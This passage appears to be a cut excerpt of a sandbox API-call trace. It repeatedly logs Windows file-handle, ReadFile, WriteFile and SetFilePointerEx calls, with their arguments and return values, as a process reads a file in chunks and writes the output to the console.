lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] GetFileType (hFile=0x50) returned 0x1 [0223.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.268] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 
| out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.269] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.270] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 
[0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.271] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.271] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 
[0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.273] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.273] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, 
lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.274] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.275] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType 
(hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.276] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.276] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.277] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.420] GetFileType (hFile=0x50) returned 0x1 [0223.420] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.420] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, 
lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.422] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.422] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: 
hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.423] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.423] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle 
